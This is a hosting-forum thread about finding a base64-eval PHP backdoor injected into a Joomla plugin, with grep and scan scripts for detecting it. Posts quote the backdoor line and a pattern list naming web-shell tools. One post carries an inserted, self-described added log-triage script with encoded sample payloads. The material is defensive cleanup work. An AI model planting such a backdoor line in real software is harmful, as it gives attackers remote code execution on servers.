  1. #1

    Find PHP code in all PHP files

    Hi to all,

    I've received a few complaints from the xlhost Datacenter

    Subject : TOS Violation - Malicious Activity


    Abuse Team,
    It appears that the below IP addresses that you seem to host have been used in recent cyber attacks. We have been informed these compromises are possibly the result of a Joomla or other CMS vulnerability and if not patched will simply be re-infected.
    We request that you investigate these IP addresses to identify any malicious activity. If you are able to confirm suspicious activity, we ask that you take appropriate action to disable the malware, patch the vulnerability or remove the devices from the network. It is also likely Joomla administrative passwords were compromised and they should be changed to prevent re-infection.
    All IPs/URLs have been confirmed as active just prior to this notification being sent. If you feel action has already been taken, please reconfirm by viewing the HTTP status with a tool like wget or cURL. If using cURL, use the following command:
    curl -A "Mozilla/4.0" -iL
    Please note the HTTP status in the first line of output: if the first line of output is 'HTTP/1.1 200 OK', that means the file exists, despite any other output in subsequent lines.
    Thank you for your immediate attention and action. Please contact us as soon as you receive this and stay in contact until any issues have been resolved. Additional technical details are provided below.
    Regards,
    Abuse Team
    Bank of America

    *********************************************************************************************************************************
    Examples of Malicious Content
    *********************************************************************************************************************************
    Malicious content:
    xxx.xxx.xxx.xxx /plugins/system/dvmessages.php,

    This site is Joomla 1.5.

    I've checked the dvmessages.php file.

    The hacked file is attached (hacked file.php).

    I examined a normal dvmessages.php file.

    The normal file is attached (normal file.php).

    The difference between the two files is the hacked code below:
    defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));

    I want to search for this code, defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id']))); in all users' PHP files under the /home folder.

    Please help me.

    Thanks All

  2. #2
    Hello Friend,

    To find a specific content in different files in a directory, you can use the below command. This command will give a list of files that contains "JEXEC" along with the path to the files.

    grep -irl JEXEC /home

    You can replace the search content with JEXEC and search.

    You can also search like "defined( '_JEXEC' )", i.e. within "", if it contains spaces.

    Please try.

  3. #3
    Hello
    I want to know how XLHost can find it? Please contact them and ask.
    Maybe they have a finder for these files.
    Thank you

  4. #4
    To search all the files of all accounts on the server, use the below command:

    for i in $(awk '{print $2}' /etc/trueuserdomains); do grep -rlF 'eval(base64_decode($_REQUEST' "/home/$i/public_html"; done
    | LinuxHostingSupport.net
    | Server Setup | Security | Optimization | Troubleshooting | Server Migration
    | Monthly and Task basis services.
    | MSN : madaboutlinux[at]hotmail.com | Skype : madaboutlinux

  5. #5
    Quote Originally Posted by madaboutlinux View Post
    To search all the files of all accounts on the server, use the below command:
    Thank you madaboutlinux
    This code works on cPanel.
    I want to search on a DirectAdmin panel.

    Best regards

  6. #6
    try this,
    find /home/ -type f -name '*.php' -exec grep -ilF 'eval(base64_decode($_REQUEST' {} +
    Kevin Cheri : Freelance Linux Admin 8+ Exp, reach me out for any help
    Skype : lynxmaestro
    Gmail : cheri.kevin@gmail.com

  7. #7
    You can use the following code as well. Save it as scan.sh and then provide execute permission to the script. Just add the search pattern that you require in the line "Pattern". You can see some common patterns already defined in the script. You will get the output as report.something.

    #!/bin/bash
    # Patterns to look for (case-insensitive extended regex); add your own, separated by |
    pattern='r57shell|c99shell|shellbot|phpshell|void\.ru|phpremoteview|directmail|bash_history|\.ru/|brute *force|multiviews|cwings|bitchx|eggdrop|guardservices|psybnc|dalnet|undernet|vulnscan|spymeta|raslan58|deface|defacing|defacer|MSRml'
    searchpath=/home/*
    # Scan .php, .cgi, .inc and .pl files; grep -l lists only the names of matching files
    find $searchpath -type f \( -name '*.php' -o -name '*.cgi' -o -name '*.inc' -o -name '*.pl' \) -print0 | xargs -0 grep -Eil "$pattern" | sort >> report.$$
    cat report.$$
    Cheers!!!
    When all else fails ... Read the documentation!!!


  8. #8
    Quote Originally Posted by gnulinuxexpert View Post
    You can use the following code as well. Save it as scan.sh and then provide execute permission to the script. Just add the search pattern that you require in the line "Pattern". You can see some common patterns already defined in the script. You will get the output as report.something.

    #!/bin/bash
    # Patterns to look for (case-insensitive extended regex); add your own, separated by |
    pattern='r57shell|c99shell|shellbot|phpshell|void\.ru|phpremoteview|directmail|bash_history|\.ru/|brute *force|multiviews|cwings|bitchx|eggdrop|guardservices|psybnc|dalnet|undernet|vulnscan|spymeta|raslan58|deface|defacing|defacer|MSRml'
    searchpath=/home/*
    # Scan .php, .cgi, .inc and .pl files; grep -l lists only the names of matching files
    find $searchpath -type f \( -name '*.php' -o -name '*.cgi' -o -name '*.inc' -o -name '*.pl' \) -print0 | xargs -0 grep -Eil "$pattern" | sort >> report.$$
    cat report.$$
    Cheers!!!
    Hello,

    Where can I use this?
    Copy it into a .sh file and run it?
    I received mail from my data center about this problem.

    Dear Sir or Madam,

    We have received spam/abuse notification. Please take the necessary
    steps to prevent this from happening again in future.

    Furthermore, we would request that you provide both ourselves and the
    person who has submitted this complaint with a short statement within
    24 hours. This statement should include details of the events leading
    up to the incident and the steps you are taking to deal with it.

    Next steps:
    - Solve the problem
    - Send your statement to us: Please use the following link for this: http://abuse.hetzner.de/ [link: reply to abuse]
    - Send your statement to the person making the complaint per email

    The details will then be checked by a colleague, who will coordinate
    further proceedings. In the event of several complaints, this may
    lead to the server being locked.

    Important information:
    When replying to us, please leave the Abuse ID [AbuseID:000000] in
    the subject line unchanged.


    Kind regards,

    Sandra Betz

    Hetzner Online AG
    Stuttgarter Straße 1
    91710 Gunzenhausen
    Tel: + 49 (0)9831 610061
    Fax: + 49 (0)9831 61006-2
    abuse@hetzner.de
    www.hetzner.com

    Register Court: Registergericht Ansbach, HRB 3204
    Management Board: Dipl. Ing. (FH) Martin Hetzner
    Chairwoman of the Supervisory Board: Diana Rothhan

    ----- attachment -----

    Dear Hetzner Abuse Team,

    We have been informed of web servers in Germany which were apparently
    compromised and are participating in DDoS attacks. Below is the list of
    servers that are in your network area. The URL points to scripts that
    have apparently been uploaded onto the servers by the attacker.

    ----- log file -----

    IP: my server ip

    Script(s):

    http://domain1.com/plugins/system/dvmessages.php
    http://domain2.com/plugins/system/dvmessages.php
    Thank you

  9. #9
    Hi,

    First of all, you should disable the following files, or your DC will suspend your server.

    http://domain1.com/plugins/system/dvmessages.php
    http://domain2.com/plugins/system/dvmessages.php

    This dvmessages.php seems to be infected and it's part of a Joomla plugin. Check the access log for the IPs that accessed the PHP file and block them. It would be better to suspend the account and reactivate it only after updating the Joomla/plugin. Update the DC that you have disabled the files, blocked the IPs and disabled the website, and will enable it only after updating the outdated plugins.

    You may check similar files like dvmessages.php using the following command.

    updatedb
    locate dvmessages.php
    Check the output and review the files to see if any is infected.

    If you are not sure about this, I would recommend you hire an administrator who knows about this.

    For executing the script, just create a file named scan.sh and copy paste the script contents.

    Save it.

    Provide execute permission using the following.

    chmod +x scan.sh
    Run it using

    ./scan.sh
    Make sure to add the particular pattern you found in dvmessages.php so the script will scan that pattern as well.

    Cheers!!!
    When all else fails ... Read the documentation!!!
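    Post #9 says to check the access log for the IPs that hit dvmessages.php and block them. As an added example that is not part of the thread, here is a small shell triage of a combined-format access log (the Apache/nginx default) that counts requests to the script per client and, because the backdoor evaluates base64_decode($_REQUEST['c_id']), also URL-decodes and base64-decodes every c_id value that arrived via GET, so you can see what the attacker actually executed. The four log lines are constructed for the demo (documentation IP ranges, invented timestamps and payloads); the functions attacker_ips and decode_c_id are mine, not part of any Joomla or hosting-panel tool. A POST hit shows up in the count but carries no decodable payload, because request bodies are not logged.

```shell
#!/bin/bash
# Added example, not from the thread: triage of a combined-format access log
# for the step in post #9 (who requested the infected script, and what did they
# make it run?). Log lines below are constructed; IPs are documentation ranges.
set -u

# write_sample_log FILE: constructed sample log for the demo and the test
write_sample_log() {
    cat > "$1" <<'EOF'
198.51.100.7 - - [10/Jun/2013:03:14:05 +0000] "GET /plugins/system/dvmessages.php?c_id=c3lzdGVtKCdpZCcpOw%3D%3D HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jun/2013:03:14:09 +0000] "POST /plugins/system/dvmessages.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
203.0.113.22 - - [10/Jun/2013:03:20:41 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 14231 "-" "Mozilla/5.0"
203.0.113.22 - - [10/Jun/2013:03:21:02 +0000] "GET /plugins/system/dvmessages.php?c_id=ZWNobyAnb2snOw%3D%3D HTTP/1.1" 200 3 "-" "curl/7.29.0"
EOF
}

# attacker_ips LOG SCRIPT: print "count ip" for every client that requested
# SCRIPT, busiest client first. $7 is the request path in combined format.
attacker_ips() {
    awk -v s="$2" 'index($7, s) { n[$1]++ } END { for (ip in n) print n[ip], ip }' "$1" | sort -rn
}

# decode_c_id LOG: pull each c_id query parameter out of the request path,
# URL-decode it (%3D -> =, %2B -> + ...) in portable awk, then base64-decode it.
decode_c_id() {
    awk '
    function urldecode(s,   hex, out, c, h) {
        hex = "0123456789ABCDEF"; out = ""
        while (s != "") {
            c = substr(s, 1, 1)
            if (c == "%" && length(s) >= 3) {
                h = toupper(substr(s, 2, 2))
                out = out sprintf("%c", (index(hex, substr(h, 1, 1)) - 1) * 16 + index(hex, substr(h, 2, 1)) - 1)
                s = substr(s, 4)
            } else { out = out c; s = substr(s, 2) }
        }
        return out
    }
    { i = index($7, "c_id=")
      if (i) { v = substr($7, i + 5); sub(/&.*/, "", v); print urldecode(v) } }' "$1" \
    | while IFS= read -r b64; do
        # a value that is not valid base64 is skipped instead of aborting the run
        printf '%s' "$b64" | base64 -d 2>/dev/null && echo
    done
}

log="$(mktemp)"
write_sample_log "$log"
echo "== requests to dvmessages.php per client IP =="
attacker_ips "$log" dvmessages.php
echo "== decoded c_id payloads =="
decode_c_id "$log"
rm -f "$log"
```

    Run attacker_ips against the real access log of each domain the data center listed, then feed the IP column into a firewall rule such as iptables -I INPUT -s 198.51.100.7 -j DROP or an Apache deny rule. The decoded payloads tell you what else to look for on the box (downloaded files, added cron jobs, new admin users), which is the part of the incident the grep-for-signature scripts in this thread cannot show you.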


  10. #10
    Quote Originally Posted by gnulinuxexpert View Post
    You can use the following code as well. Save it as scan.sh and then provide execute permission to the script. Just add the search pattern that you require in the line "Pattern". You can see some common patterns already defined in the script. You will get the output as report.something.

    Cheers!!!
    c99 files are coded with base64 or ionCube.
    None of the new c99 shell files are released with their main code open.

  11. #11
    Quote Originally Posted by gnulinuxexpert View Post
    You can use the following code as well. Save it as scan.sh and then provide execute permission to the script. Just add the search pattern that you require in the line "Pattern". You can see some common patterns already defined in the script. You will get the output as report.something.

    Cheers!!!
    Hi

    How can I create a .sh to search with the code

    for i in $(awk '{print $2}' /etc/trueuserdomains); do grep -rlF 'eval(base64_decode($_REQUEST' "/home/$i/public_html"; done

    and save all results and move the found files to another directory, sample path /home/Quarantine?

    When run, the .sh file should search, move the found files to another folder, and report the scan results.

    Thank you
